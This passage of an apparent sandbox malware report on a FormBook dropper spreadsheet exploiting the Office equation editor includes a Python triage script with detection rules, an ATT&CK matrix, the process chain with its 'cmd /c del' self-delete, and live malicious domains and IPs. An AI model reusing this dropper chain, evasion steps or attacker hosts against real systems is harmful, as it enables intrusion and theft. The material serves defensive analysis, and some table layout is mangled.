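    r"Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding",
    r"Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding",
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network Connect: 3.121.113.175 80",
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file",
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'",
    r"Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe",
    r"Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe",
    r"Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'",
    r"Source: C:\Windows\explorer.exe Domain query: www.pon.xyz",
    r"Source: C:\Windows\explorer.exe Network Connect: 151.101.0.119 80",
]


def basename(path):
    return PureWindowsPath(path).name.lower()


def parse_row(row):
    """(source process, event kind, value) for a row we track, else None."""
    m = ROW_RE.match(row)
    return (m["src"], m["kind"], m["val"]) if m else None


def split_image_cmd(val):
    # 'C:\dir with spaces\a.exe <command line>' -> ('C:\dir with spaces\a.exe', '<command line>')
    m = IMAGE_RE.match(val)
    return (m["image"], m["cmd"] or "") if m else (val, "")


def args_without_image(cmd, image):
    """Strip argv[0] (quoted or not); an empty result means the process got no arguments."""
    return re.sub(r"^['\"]?" + re.escape(image) + r"['\"]?", "", cmd, flags=re.I).strip()


def lineage(image, parent_of):
    """Lower-cased image paths of a process and of every ancestor recorded so far."""
    seen, cur = [], image
    while cur and cur.lower() not in seen:
        seen.append(cur.lower())
        cur = parent_of.get(cur)
    return set(seen)


def triage(rows):
    """Return ([(rule, detail), ...], {parent image: [child images]})."""
    findings, parent_of, children = [], {}, defaultdict(list)
    for row in rows:
        parsed = parse_row(row)
        if not parsed:
            continue
        src, kind, val = parsed
        if kind in ("Network Connect", "Domain query"):
            if basename(src) in SYSTEM_NO_NET:
                findings.append(("system_process_network", f"{basename(src)} -> {val}"))
        elif kind == "File created":
            if val.lower().startswith("c:\\users\\public\\"):
                findings.append(("drop_user_root", val))
        else:  # Process created
            image, cmd = split_image_cmd(val)
            parent_of[image] = src
            children[src].append(image)
            if basename(src) == "eqnedt32.exe":
                findings.append(("eqnedt32_spawn", f"{basename(src)} -> {image}"))
            if any(d in image.lower() for d in SUSPICIOUS_DIRS):
                findings.append(("suspicious_folder", image))
            if basename(image) == "rundll32.exe" and not args_without_image(cmd, image):
                findings.append(("rundll32_no_args", f"{src} -> {image}"))
            if basename(image) == "cmd.exe":
                m = re.search(r"/c\s+del\s+['\"]?([^'\"]+?)['\"]?\s*$", cmd, re.I)
                if m and m.group(1).lower() in lineage(src, parent_of):   # deletes its own ancestor
                    findings.append(("self_delete", f"{src} deletes {m.group(1)}"))
    return findings, dict(children)


if __name__ == "__main__":
    found, tree = triage(ROWS)
    for rule, detail in found:
        print(f"[{rule}] {detail}")
    for parent, kids in tree.items():
        print(basename(parent) if parent != "unknown" else parent, "->", ", ".join(basename(k) for k in kids))
```

Processes are keyed by image path because the report rows carry no PIDs; on real Sysmon or EDR telemetry key them by PID and parent PID instead, otherwise the vbc.exe self-launch collapses into one node. The rules are deliberately narrow: they will not catch a loader dropped outside the listed folders or a rundll32 given a decoy argument, so treat them as the starting point of a hunt, not its boundary.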

      Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

      Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000008.00000002.2357669538.0000000000280000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2243103543.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2243140474.0000000000200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2243270278.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2357639066.00000000001F0000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Numbers in parentheses are the report's per-technique signature counts; "-" marks an empty cell.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules (1) | Path Interception | Process Injection (6 1 2) | Masquerading (1 1 1) | OS Credential Dumping | Security Software Discovery (1 2 1) | Remote Services | Archive Collected Data (1 1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution (1 3) | Boot or Logon Initialization Scripts | Extra Window Memory Injection (1) | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer (1 2) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (3 1) | Security Account Manager | Virtualization/Sandbox Evasion (3 1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (6 1 2) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (1 2 2) | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1 1) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information (3 1) | Cached Domain Credentials | System Information Discovery (1 1 3) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll32 (1) | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | - | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing (3) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | - | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Extra Window Memory Injection (1) | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | - | Data Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      Behavior Graph ID: 452641  Sample: Form BA.xlsx  Startdate: 22/07/2021  Architecture: WINDOWS  Score: 100

      Sample-level signatures and network indicators:
      • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      • Found malware configuration
      • Malicious sample detected (through community Yara rule)
      • 14 other signatures
      • DNS/IP: www.800pls.info

      EXCEL.EXE (node 15; counts shown in graph: 34 36), started
      • Created file: C:\Users\user\Desktop\~$Form BA.xlsx, data

      EQNEDT32.EXE (node 10; count shown in graph: 12), started
      • DNS/IP: 3.121.113.175, 49165, 80 AMAZON-02US United States
      • Dropped: C:\Users\user\AppData\Local\...\pool[1].exe, PE32
      • Dropped: C:\Users\Public\vbc.exe, PE32
      • Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      • Started: vbc.exe (node 17)

      vbc.exe (node 17), started by EQNEDT32.EXE
      • Machine Learning detection for dropped file
      • Tries to detect virtualization through RDTSC time measurements
      • Injects a PE file into a foreign processes
      • Started: vbc.exe (node 20)

      vbc.exe (node 20), started by vbc.exe (node 17)
      • Modifies the context of a thread in another process (thread injection)
      • Maps a DLL or memory area into another process
      • Sample uses process hollowing technique
      • Queues an APC in another process (thread injection)
      • Started: rundll32.exe (node 23)
      • Injected: explorer.exe (node 26)

      rundll32.exe (node 23), started by vbc.exe (node 20)
      • Modifies the context of a thread in another process (thread injection)
      • Maps a DLL or memory area into another process
      • Tries to detect virtualization through RDTSC time measurements
      • Started: cmd.exe (node 29)

      explorer.exe (node 26), injected by vbc.exe (node 20)
      • DNS/IP: intoxickiss.com 151.101.0.119, 49167, 80 FASTLYUS United States
      • DNS/IP: www.pon.xyz
      • 2 other IPs or domains
      • System process connects to network (likely due to code injection or exploit)
      • Performs DNS queries to domains with low reputation

      Screenshots


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      Form BA.xlsx | 31% | Virustotal |
      Form BA.xlsx | 30% | ReversingLabs | Win32.Exploit.CVE-2017-11882

      Dropped Files

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe | 100% | Joe Sandbox ML |
      C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML |

      Unpacked PE Files

      Source | Detection | Scanner | Label
      6.2.vbc.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
      6.2.vbc.exe.8967b0.2.unpack | 100% | Avira | TR/ATRAPS.Gen
      6.3.vbc.exe.8967b0.0.unpack | 100% | Avira | TR/ATRAPS.Gen

      Domains

      No Antivirus matches

      URLs

      Source | Detection | Scanner | Label
      http://www.google.com.br/ | 0% | Avira URL Cloud | safe
      http://www.mercadolivre.com.br/ | 0% | URL Reputation | safe
      http://www.merlin.com.pl/favicon.ico | 0% | URL Reputation | safe
      http://www.dailymail.co.uk/ | 0% | URL Reputation | safe
      http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
      www.gaigoilaocai.com/wufn/ | 0% | Avira URL Cloud | safe
      http://image.excite.co.jp/jp/favicon/lep.ico | 0% | URL Reputation | safe
      http://busca.igbusca.com.br//app/static/images/favicon.ico | 0% | URL Reputation | safe
      http://www.google.com.tw/ | 0% | Avira URL Cloud | safe
      http://www.etmall.com.tw/favicon.ico | 0% | URL Reputation | safe
      http://it.search.dada.net/favicon.ico | 0% | URL Reputation | safe
      http://search.hanafos.com/favicon.ico | 0% | URL Reputation | safe
      http://cgi.search.biglobe.ne.jp/favicon.ico | 0% | Avira URL Cloud | safe
      http://www.abril.com.br/favicon.ico | 0% | URL Reputation | safe
      http://search.msn.co.jp/results.aspx?q= | 0% | URL Reputation | safe
      http://buscar.ozu.es/ | 0% | URL Reputation | safe
      http://busca.igbusca.com.br/ | 0% | URL Reputation | safe
      http://search.auction.co.kr/ | 0% | URL Reputation | safe
      http://busca.buscape.com.br/favicon.ico | 0% | URL Reputation | safe
      http://www.pchome.com.tw/favicon.ico | 0% | URL Reputation | safe
      http://browse.guardian.co.uk/favicon.ico | 0% | URL Reputation | safe
      http://google.pchome.com.tw/ | 0% | URL Reputation | safe
      http://www.ozu.es/favicon.ico | 0% | URL Reputation | safe
      http://search.yahoo.co.jp/favicon.ico | 0% | URL Reputation | safe
      http://www.gmarket.co.kr/ | 0% | URL Reputation | safe
      http://searchresults.news.com.au/ | 0% | URL Reputation | safe
      http://www.asharqalawsat.com/ | 0% | URL Reputation | safe
      http://search.yahoo.co.jp | 0% | URL Reputation | safe
      http://buscador.terra.es/ | 0% | URL Reputation | safe
      http://search.orange.co.uk/favicon.ico | 0% | URL Reputation | safe
      http://www.iask.com/ | 0% | URL Reputation | safe
      http://cgi.search.biglobe.ne.jp/ | 0% | Avira URL Cloud | safe
      http://search.ipop.co.kr/favicon.ico | 0% | URL Reputation | safe
      http://p.zhongsou.com/favicon.ico | 0% | URL Reputation | safe
      http://service2.bfast.com/ | 0% | URL Reputation | safe

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      71822.bodis.com | 199.59.242.153 | true | false | | high
      intoxickiss.com | 151.101.0.119 | true | true | | unknown
      www.800pls.info | unknown | unknown | true | | unknown
      www.pon.xyz | unknown | unknown | true | | unknown
      www.intoxickiss.com | unknown | unknown | true | | unknown

                Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      www.gaigoilaocai.com/wufn/ | true | Avira URL Cloud: safe | low

                URLs from Memory and Binaries

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://www.google.com.br/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
      http://search.chol.com/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.mercadolivre.com.br/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://www.merlin.com.pl/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://search.ebay.de/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.mtv.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.rambler.ru/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.nifty.com/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.dailymail.co.uk/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://www3.fnac.com/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://buscar.ya.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://search.yahoo.com/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.iis.fhg.de/audioPA | explorer.exe, 00000007.00000000.2194898096.0000000004B50000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
      http://www.sogou.com/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://asp.usatoday.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://fr.search.yahoo.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://rover.ebay.com | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://in.search.yahoo.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://img.shopzilla.com/shopzilla/shopzilla.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://search.ebay.in/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://image.excite.co.jp/jp/favicon/lep.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://msk.afisha.ru/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://busca.igbusca.com.br//app/static/images/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://www.google.com.tw/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
      http://search.rediff.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.windows.com/pctv. | explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmp | false | | high
      http://www.ya.com/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.etmall.com.tw/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://it.search.dada.net/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://search.naver.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.google.ru/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://search.hanafos.com/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://cgi.search.biglobe.ne.jp/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | Avira URL Cloud: safe | unknown
      http://www.abril.com.br/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://search.daum.net/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://search.naver.com/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://search.msn.co.jp/results.aspx?q= | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://www.clarin.com/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://buscar.ozu.es/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://kr.search.yahoo.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://search.about.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://busca.igbusca.com.br/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.ask.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.priceminister.com/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.cjmall.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://search.centrum.cz/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://suche.t-online.de/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.google.it/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://search.auction.co.kr/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://www.ceneo.pl/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.amazon.de/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000007.00000000.2201672465.000000000842E000.00000004.00000001.sdmp | false | | high
      http://sads.myspace.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://busca.buscape.com.br/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://www.pchome.com.tw/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://browse.guardian.co.uk/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://google.pchome.com.tw/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://list.taobao.com/browse/search_visual.htm?n=15&q= | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.rambler.ru/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://uk.search.yahoo.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://espanol.search.yahoo.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.ozu.es/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://search.sify.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://openimage.interpark.com/interpark.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://search.yahoo.co.jp/favicon.ico | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://search.ebay.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.gmarket.co.kr/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://search.nifty.com/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://searchresults.news.com.au/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | URL Reputation: safe | unknown
      http://www.google.si/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
      http://www.google.cz/ | explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmp | false | | high
                                                                                                              http://www.soso.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.univision.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://api.twitter.com/1/direct_messages.xml?since_id=vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://search.ebay.it/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://www.asharqalawsat.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://busca.orange.es/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://twitter.com/statuses/user_timeline.xml?screen_name=vbc.exe, vbc.exe, 00000006.00000000.2183745141.0000000000272000.00000020.00020000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://search.yahoo.co.jpexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              http://www.target.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://buscador.terra.es/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://search.orange.co.uk/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.iask.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.tesco.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cgi.search.biglobe.ne.jp/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://search.seznam.cz/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://suche.freenet.de/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://search.interpark.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://clients5.google.com/complete/search?hl=explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          http://investor.msn.com/explorer.exe, 00000007.00000000.2192937299.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.espn.go.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://www.myspace.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://search.centrum.cz/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://p.zhongsou.com/favicon.icoexplorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://service2.bfast.com/explorer.exe, 00000007.00000000.2206093326.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs


Public

IP | Domain | Country | ASN | ASN name | Malicious
199.59.242.153 | 71822.bodis.com | United States | 395082 | BODIS-NJUS | false
3.121.113.175 | unknown | United States | 16509 | AMAZON-02US | true
151.101.0.119 | intoxickiss.com | United States | 54113 | FASTLYUS | true

Both addresses flagged malicious sit on shared infrastructure (Amazon AS16509 and Fastly AS54113) and the Bodis address is a domain-parking host, so the contacted domains and URL paths are more durable indicators than these IPs.

                                                                                                                                                  General Information

